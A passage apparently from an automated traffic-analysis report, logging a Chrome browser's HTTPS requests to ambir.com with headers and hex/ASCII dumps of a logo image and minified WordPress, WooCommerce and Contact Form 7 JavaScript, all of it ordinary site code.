                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 65 74 45 78 70 72 65 73 73 69 6f 6e 28 22 74 6f 70 22 2c 27 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 20 2f 20 32 20 2d 20 28 74 68 69 73 2e 6f 66 66 73 65 74 48 65 69 67 68 74 20 2f 20 32 29 20 2b 20 28 62 6c 61 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3f 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3a 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 29 20 2b 20 22 70 78 22 27 29 2c 6f 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 3b 65 6c 73
                                                                                                                                                                                              Data Ascii: etExpression("top",'(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"'),o.marginTop=0;els
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6d 65 6f 75 74 28 66 29 2c 61 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 74 69 6d 65 6f 75 74 22 29 29 2c 6f 3d 65 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2e 62 6c 6f 63 6b 55 49 2e 64 65 66 61 75 6c 74 73 2c 6f 7c 7c 7b 7d 29 2c 72 28 30 2c 74 2c 6f 29 2c 6e 75 6c 6c 3d 3d 3d 6f 2e 6f 6e 55 6e 62 6c 6f 63 6b 26 26 28 6f 2e 6f 6e 55 6e 62 6c 6f 63 6b 3d 61 2e 64 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 6f 6e 55 6e 62 6c 6f 63 6b 22 29 2c 61 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 6f 6e 55 6e 62 6c 6f 63 6b 22 29 29 2c 69 3d 64 3f 65 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 6c 74 65 72 28 22 2e 62 6c 6f 63 6b 55 49 22 29 2e 61 64 64 28 22 62 6f 64 79 20 3e 20 2e 62 6c 6f 63
                                                                                                                                                                                              Data Ascii: meout(f),a.removeData("blockUI.timeout")),o=e.extend({},e.blockUI.defaults,o||{}),r(0,t,o),null===o.onUnblock&&(o.onUnblock=a.data("blockUI.onUnblock"),a.removeData("blockUI.onUnblock")),i=d?e(document.body).children().filter(".blockUI").add("body > .bloc
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 54 61 62 4b 65 79 29 7b 76 61 72 20 6f 3d 6c 2c 6e 3d 21 74 2e 73 68 69 66 74 4b 65 79 26 26 74 2e 74 61 72 67 65 74 3d 3d 3d 6f 5b 6f 2e 6c 65 6e 67 74 68 2d 31 5d 2c 69 3d 74 2e 73 68 69 66 74 4b 65 79 26 26 74 2e 74 61 72 67 65 74 3d 3d 3d 6f 5b 30 5d 3b 69 66 28 6e 7c 7c 69 29 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 28 69 29 7d 2c 31 30 29 2c 21 31 7d 76 61 72 20 64 3d 74 2e 64 61 74 61 2c 61 3d 65 28 74 2e 74 61 72 67 65 74 29 3b 72 65 74 75 72 6e 20 61 2e 68 61 73 43 6c 61 73 73 28 22 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 22 29 26 26 64 2e 6f 6e 4f 76 65 72 6c 61 79 43 6c 69 63 6b 26 26 64 2e 6f 6e 4f 76 65 72 6c 61 79 43 6c 69 63 6b 28 74 29 2c 61 2e 70 61 72 65 6e 74 73 28 22 64 69 76 2e 22 2b 64 2e
                                                                                                                                                                                              Data Ascii: TabKey){var o=l,n=!t.shiftKey&&t.target===o[o.length-1],i=t.shiftKey&&t.target===o[0];if(n||i)return setTimeout(function(){f(i)},10),!1}var d=t.data,a=e(t.target);return a.hasClass("blockOverlay")&&d.onOverlayClick&&d.onOverlayClick(t),a.parents("div."+d.
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 28 29 2c 61 2e 72 65 71 75 65 73 74 73 2e 73 68 69 66 74 28 29 2c 61 2e 72 65 71 75 65 73 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 61 2e 72 75 6e 28 29 7d 2c 74 2e 61 6a 61 78 28 74 68 69 73 2e 72 65 71 75 65 73 74 73 5b 30 5d 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 41 64 64 54 6f 43 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 69 66 28 65 2e 69 73 28 22 2e 61 6a 61 78 5f 61 64 64 5f 74 6f 5f 63 61 72 74 22 29 29 7b 69 66 28 21 65 2e 61 74 74 72 28 22 64 61 74 61 2d 70 72 6f 64 75 63 74 5f 69 64 22 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 61 2e 64 61 74 61 2e 61 64 64 54 6f 43 61 72 74 48 61 6e 64 6c 65 72 2e 24 6c 69 76 65 52 65 67 69 6f 6e 2e 74 65 78 74 28
                                                                                                                                                                                              Data Ascii: "==typeof e&&e(),a.requests.shift(),a.requests.length>0&&a.run()},t.ajax(this.requests[0])},a.prototype.onAddToCart=function(a){var e=t(this);if(e.is(".ajax_add_to_cart")){if(!e.attr("data-product_id"))return!0;if(a.data.addToCartHandler.$liveRegion.text(
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 2e 77 63 5f 61 6a 61 78 5f 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 22 25 25 65 6e 64 70 6f 69 6e 74 25 25 22 2c 22 72 65 6d 6f 76 65 5f 66 72 6f 6d 5f 63 61 72 74 22 29 2c 64 61 74 61 3a 7b 63 61 72 74 5f 69 74 65 6d 5f 6b 65 79 3a 65 2e 64 61 74 61 28 22 63 61 72 74 5f 69 74 65 6d 5f 6b 65 79 22 29 7d 2c 73 75 63 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 61 2e 66 72 61 67 6d 65 6e 74 73 3f 74 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 74 72 69 67 67 65 72 28 22 72 65 6d 6f 76 65 64 5f 66 72 6f 6d 5f 63 61 72 74 22 2c 5b 61 2e 66 72 61 67 6d 65 6e 74 73 2c 61 2e 63 61 72 74 5f 68 61 73 68 2c 65 5d 29 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 65 2e 61 74
                                                                                                                                                                                              Data Ascii: to_cart_params.wc_ajax_url.toString().replace("%%endpoint%%","remove_from_cart"),data:{cart_item_key:e.data("cart_item_key")},success:function(a){a&&a.fragments?t(document.body).trigger("removed_from_cart",[a.fragments,a.cart_hash,e]):window.location=e.at


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              47192.168.2.549783141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC618OUTGET /wp-content/uploads/2024/10/logo.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                              Content-Length: 4236
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=7047
                                                                                                                                                                                              Content-Disposition: inline; filename="logo.webp"
                                                                                                                                                                                              ETag: "671034a1-1b87"
                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 21:48:17 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13811
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fa40828c339-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:23 UTC838INData Raw: 52 49 46 46 84 10 00 00 57 45 42 50 56 50 38 4c 78 10 00 00 2f af 04 4e 10 ff 27 16 4c 86 9b bf 48 ef 2c 0f ca 04 24 74 9c 07 3d fe ff d7 29 cd 07 a5 ed ee 8e cd 42 e7 ec ee 8e a5 dd ed c2 0e 5c da dd dd dd b1 36 d1 d9 ba b2 93 19 e8 c4 0e c4 00 a4 de 7f dc 79 70 9f df f7 be bf cf 6f f5 8b e8 ff 04 90 ed 7f db ff b6 ff 6d ff db fe b7 fd 6f fb df f6 bf ed 7f db ff b6 ff 6d ff db fe b7 fd 6f fb df f6 bf ed 7f db ff b6 ff 6d ff db fe b7 fd 6f fb df f6 bf ed ff ff 5f 98 ba 70 d5 a6 ed 3b 0e 18 3e 44 81 c3 ba 77 fc b0 51 f5 32 85 32 fa fd 2b 85 77 d1 ea ad 83 e7 ad db 77 e5 29 d4 fb fc e1 95 13 bb 57 4d 1f f0 7e d5 fc 1e 66 e1 2f 87 8d fc eb 22 4f d1 e1 f8 61 23 1f 39 5a 48 29 4d 7f 3d ec a1 8f fc b8 f9 bb 95 0b a6 8f 1a d2 b3 4d bd 4a 45 b3 fa 78 9a 86 c7 0f
                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8Lx/N'LH,$t=)B\6ypomomomo_p;>DwQ22+ww)WM~f/"Oa#9ZH)M=MJEx
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: dd d2 19 fc a4 2b 08 52 d6 11 a9 c1 e7 52 86 85 ee ca 09 20 9c 5c 38 33 78 e0 97 4b 9f 22 11 88 4d eb 40 c7 00 d4 32 dc 3c e8 6d 5b 5d 39 a4 aa 9a 10 1b e4 95 32 34 71 d3 48 00 1f b9 b2 9c 88 28 fb 49 00 f8 d0 49 2d 00 1b 8c 16 04 cd 8d 0c d0 14 54 55 d4 69 c1 f9 5e cc 1e fb b9 e7 2c 10 9d da 95 2d 0e 54 cf 61 bc 13 ba 02 3c f3 37 d8 7e dd c1 68 5d 39 a9 a6 c6 10 1c 14 90 32 4c 74 4b 1e 00 df 53 d2 8a 38 cc 71 36 11 40 4d 63 55 84 f6 c6 a4 d6 14 b4 50 d2 55 d1 99 28 66 c8 e0 8e 77 01 0c 70 69 b3 93 77 1d be 76 d6 02 c0 10 63 fd a8 3f e8 af 2b 57 55 d4 1a a2 73 cf 47 cc c6 b8 63 38 80 06 2e ad 76 a8 7a d3 e1 5d 67 45 01 2c 32 54 56 68 70 a8 ae a0 8b 82 6e c9 0e 9a 88 d9 e3 14 6e 98 0e a0 8c 4b 77 b7 6f df 7e 0a 8e 31 81 ce d2 be 00 7e 30 d4 60 1d c2 db ba
                                                                                                                                                                                              Data Ascii: +RR \83xK"M@2<m[]924qH(II-TUi^,-Ta<7~h]92LtKS8q6@McUPU(fwpiwvc?+WUsGc8.vz]gE,2TVhpnnKwo~1~0`
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 4b e6 ae 09 b8 e6 15 9f 85 1a 74 d7 c3 a5 7f a4 45 b4 97 0b 1a 1a 62 24 98 3e f7 37 79 b3 b8 fc 49 e2 b3 44 83 6e 78 b8 8c 11 7a 54 9c 4d a8 11 d2 44 73 e9 47 e6 ce eb 21 97 45 56 d8 2d 11 a1 2d 5c d0 ca 00 33 c1 34 9c 4c de 40 70 6d 21 6a 9f 58 1a b9 d8 84 f3 cb 90 c0 a5 ad c9 cb 1d cd 25 d2 4f d4 3a 58 1a 34 97 0b 3e 66 b7 04 4c 2f 92 b9 cb 71 1d 5c 17 91 a8 bd 67 6d a4 8b e5 12 e1 cd 2c 17 b8 d6 33 75 5e dd ee 83 ed 9b b2 d6 c8 da a0 af b9 e0 4b 66 eb b9 1c 26 7d aa a6 9c 14 55 47 85 82 ef 0e 12 a0 85 9c ca 5b 1c 3e 11 5c e2 52 b1 2a 02 ae 65 34 aa 47 be 82 aa 2c 90 bf d5 57 23 67 ef 0e 07 eb 02 12 b4 86 51 62 51 8b 83 3e e2 82 19 ac be e7 f2 2d 69 54 c2 ab 38 65 be 02 ff 71 24 41 db 19 3d c9 60 75 d0 2d 2e c8 c6 28 08 5c f3 e8 94 47 3f 43 22 74 9c d1
                                                                                                                                                                                              Data Ascii: KtEb$>7yIDnxzTMDsG!EV--\34L@pm!jX%O:X4>fL/q\gm,3u^Kf&}UG[>\R*e4G,W#gQbQ>-iT8eq$A=`u-.(\G?C"t
                                                                                                                                                                                              2024-11-20 20:28:23 UTC660INData Raw: 7e a8 66 e1 d0 32 35 ec 24 e9 f8 09 8c bf 15 18 a2 2a c7 d8 75 b4 72 32 c7 2b a1 a0 74 2c 01 e7 65 22 43 34 88 5b b0 95 43 93 54 b0 82 64 a3 f6 af 60 3d 4d 68 a8 25 b3 39 96 4e c0 0b e3 25 66 36 0b e3 94 94 b9 d3 7e 30 1f 22 35 d4 8a d7 66 4b 87 86 18 6f 02 99 85 5d ef b6 56 67 c7 fa 59 73 17 af d1 7d fc de a7 60 df 5a 6c 68 21 ab bd d6 0e dd 37 da 8b 00 d3 a0 d8 c8 18 18 b4 aa dc f8 46 70 fa dd e2 e9 68 b4 81 24 13 86 8d cb 2c 37 f4 19 a7 cb 29 ac 1d ba 62 ac bb 5e b2 74 89 04 27 53 3c a3 30 ab a7 91 b1 da 90 2c ad 95 1c da cd e8 7e 3a 8b 87 fe 30 d2 25 12 a6 be a2 33 88 d1 f3 1c 56 4f 45 23 d5 95 a6 62 a2 53 95 d1 d3 ac 56 0f ed 36 ce 51 12 a6 4b 24 3a 99 5e f2 89 c8 6c f9 14 33 ce 5b d2 34 4e 76 e8 02 9f d8 82 96 0f ad 37 ca 0f 24 4d 25 84 67 0f 1f 94
                                                                                                                                                                                              Data Ascii: ~f25$*ur2+t,e"C4[CTd`=Mh%9N%f6~0"5fKo]VgYs}`Zlh!7Fph$,7)b^t'S<0,~:0%3VOE#bSV6QK$:^l3[4Nv7$M%g


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              48192.168.2.549785141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC412OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-804f7b28.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-36b75"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6835
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fa49b588c3c-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:23 UTC878INData Raw: 37 64 63 35 0d 0a 0a 0a 76 61 72 20 77 70 63 66 37 20 3d 20 7b 0a 20 20 20 20 22 61 70 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 72 6f 6f 74 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6d 62 69 72 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 0a 20 20 20 20 20 20 20 20 22 6e 61 6d 65 73 70 61 63 65 22 3a 20 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 61 63 68 65 64 22 3a 20 31 0a 7d 3b 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 77 69 6e 64 6f 77 2e 77 70 2e 69 31 38 6e 2c 74 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 61 3d 28 65 2c 74 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 43 75 73 74 6f 6d
                                                                                                                                                                                              Data Ascii: 7dc5var wpcf7 = { "api": { "root": "https:\/\/ambir.com\/wp-json\/", "namespace": "contact-form-7\/v1" }, "cached": 1};(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new Custom
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 61 74 75 73 22 2c 74 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 74 29 2c 72 26 26 72 21 3d 3d 74 29 7b 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 72 29 3b 63 6f 6e 73 74 20 74 3d 7b 63 6f 6e 74 61 63 74 46 6f 72 6d 49 64 3a 65 2e 77 70 63 66 37 2e 69 64 2c 70 6c 75 67 69 6e 56 65 72 73 69 6f 6e 3a 65 2e 77 70 63 66 37 2e 70 6c 75 67 69 6e 56 65 72 73 69 6f 6e 2c 63 6f 6e 74 61 63 74 46 6f 72 6d 4c 6f 63 61 6c 65 3a 65 2e 77 70 63 66 37 2e 6c 6f 63 61 6c 65 2c 75 6e 69 74 54 61 67 3a 65 2e 77 70 63 66 37 2e 75 6e 69 74 54 61 67 2c 63 6f 6e 74 61 69 6e 65 72 50 6f 73 74 49 64 3a 65 2e 77 70 63 66 37 2e 63 6f 6e 74 61 69 6e 65 72 50 6f 73 74 2c 73 74 61 74 75 73
                                                                                                                                                                                              Data Ascii: ,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVersion:e.wpcf7.pluginVersion,contactFormLocale:e.wpcf7.locale,unitTag:e.wpcf7.unitTag,containerPostId:e.wpcf7.containerPost,status
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 21 65 2e 63 6f 6e 74 61 69 6e 73 28 61 29 29 72 65 74 75 72 6e 3b 69 66 28 21 61 2e 63 6c 6f 73 65 73 74 28 22 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 5b 64 61 74 61 2d 6e 61 6d 65 5d 22 29 29 72 65 74 75 72 6e 3b 69 66 28 61 2e 63 6c 6f 73 65 73 74 28 22 2e 6e 6f 76 61 6c 69 64 61 74 65 22 29 29 72 65 74 75 72 6e 7d 63 6f 6e 73 74 20 70 3d 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 22 29 2c 64 3d 41 72 72 61 79 2e 66 72 6f 6d 28 70 29 2e 72 65 64 75 63 65 28 28 28 65 2c 74 29 3d 3e 28 74 2e 63 6c 6f 73 65 73 74 28 22 2e 6e 6f 76 61 6c 69 64 61 74 65 22 29 7c 7c 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 77 68 65 72
                                                                                                                                                                                              Data Ascii: !e.contains(a))return;if(!a.closest(".wpcf7-form-control-wrap[data-name]"))return;if(a.closest(".novalidate"))return}const p=r.querySelectorAll(".wpcf7-form-control-wrap"),d=Array.from(p).reduce(((e,t)=>(t.closest(".novalidate")||t.querySelectorAll(":wher
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 22 3e 24 7b 61 7d 3c 2f 61 3e 60 29 3a 74 2e 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 54 65 78 74 28 22 62 65 66 6f 72 65 65 6e 64 22 2c 61 29 2c 65 2e 77 70 63 66 37 2e 70 61 72 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 75 6c 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 29 28 29 2c 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 77 72 61 70 5b 64 61 74 61 2d 6e 61 6d 65 3d 22 24 7b 74 7d 22 5d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 29 3b 74 2e 63 6c 61 73 73 4c 69 73 74
                                                                                                                                                                                              Data Ascii: ">${a}</a>`):t.insertAdjacentText("beforeend",a),e.wpcf7.parent.querySelector(".screen-reader-response ul").appendChild(t)})(),r.querySelectorAll(`.wpcf7-form-control-wrap[data-name="${t}"]`).forEach((e=>{const t=document.createElement("span");t.classList
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 65 74 43 75 73 74 6f 6d 56 61 6c 69 64 69 74 79 26 26 65 2e 73 65 74 43 75 73 74 6f 6d 56 61 6c 69 64 69 74 79 28 22 22 29 7d 29 29 7d 29 29 7d 2c 6c 3d 28 65 2c 74 2c 61 29 3d 3e 7b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 5b 64 61 74 61 2d 72 65 66 6c 65 63 74 69 6f 6e 2d 6f 66 3d 22 24 7b 74 7d 22 5d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 22 6f 75 74 70 75 74 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 63 6f 6e 73 74 20 74 3d 65 3b 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 26 26 61 2e 70 75 73 68 28 74 2e 64 61 74 61 73 65 74 2e 64 65 66 61 75 6c 74 29 2c 61 2e 73 6c 69 63 65 28 30 2c 31 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e
                                                                                                                                                                                              Data Ascii: tion"==typeof e.setCustomValidity&&e.setCustomValidity("")}))}))},l=(e,t,a)=>{e.querySelectorAll(`[data-reflection-of="${t}"]`).forEach((e=>{if("output"===e.tagName.toLowerCase()){const t=e;0===a.length&&a.push(t.dataset.default),a.slice(0,1).forEach((e=>
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 26 26 61 28 65 2c 60 6d 61 69 6c 24 7b 72 7d 60 2c 6f 29 2c 61 28 65 2c 22 73 75 62 6d 69 74 22 2c 6f 29 2c 74 7d 29 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 74 2e 70 6f 73 74 65 64 5f 64 61 74 61 5f 68 61 73 68 26 26 28 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 5f 77 70 63 66 37 5f 70 6f 73 74 65 64 5f 64 61 74 61 5f 68 61 73 68 22 5d 27 29 2e 76 61 6c 75 65 3d 74 2e 70 6f 73 74 65 64 5f 64 61 74 61 5f 68 61 73 68 29 2c 22 6d 61 69 6c 5f 73 65 6e 74 22 3d 3d 3d 74 2e 73 74 61 74 75 73 26 26 28 65 2e 72 65 73 65 74 28 29 2c 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 3d 21 30 29 2c 74 2e 69 6e 76 61 6c 69 64 5f 66 69 65 6c 64 73 26 26 74 2e 69 6e 76
                                                                                                                                                                                              Data Ascii: "].includes(r)&&a(e,`mail${r}`,o),a(e,"submit",o),t})).then((t=>{t.posted_data_hash&&(e.querySelector('input[name="_wpcf7_posted_data_hash"]').value=t.posted_data_hash),"mail_sent"===t.status&&(e.reset(),e.wpcf7.resetOnMailSent=!0),t.invalid_fields&&t.inv
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 69 6e 74 3a 22 72 65 66 69 6c 6c 22 2c 66 6f 72 6d 3a 65 2c 64 65 74 61 69 6c 3a 63 7d 7d 29 2e 74 68 65 6e 28 28 74 3d 3e 7b 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 3f 28 64 65 6c 65 74 65 20 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 2c 6e 28 65 2c 22 6d 61 69 6c 5f 73 65 6e 74 22 29 29 3a 6e 28 65 2c 22 69 6e 69 74 22 29 2c 63 2e 61 70 69 52 65 73 70 6f 6e 73 65 3d 74 2c 61 28 65 2c 22 72 65 73 65 74 22 2c 63 29 7d 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 29 29 7d 72 2e 75 73 65 28 28 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 77 70 63 66 37 26 26 22 72 65 66 69 6c 6c 22 3d 3d 3d 65 2e 77 70 63 66 37 2e 65 6e 64 70 6f 69 6e 74 29 7b 63 6f 6e 73 74 7b 66 6f
                                                                                                                                                                                              Data Ascii: int:"refill",form:e,detail:c}}).then((t=>{e.wpcf7.resetOnMailSent?(delete e.wpcf7.resetOnMailSent,n(e,"mail_sent")):n(e,"init"),c.apiResponse=t,a(e,"reset",c)})).catch((e=>console.error(e)))}r.use(((e,t)=>{if(e.wpcf7&&"refill"===e.wpcf7.endpoint){const{fo
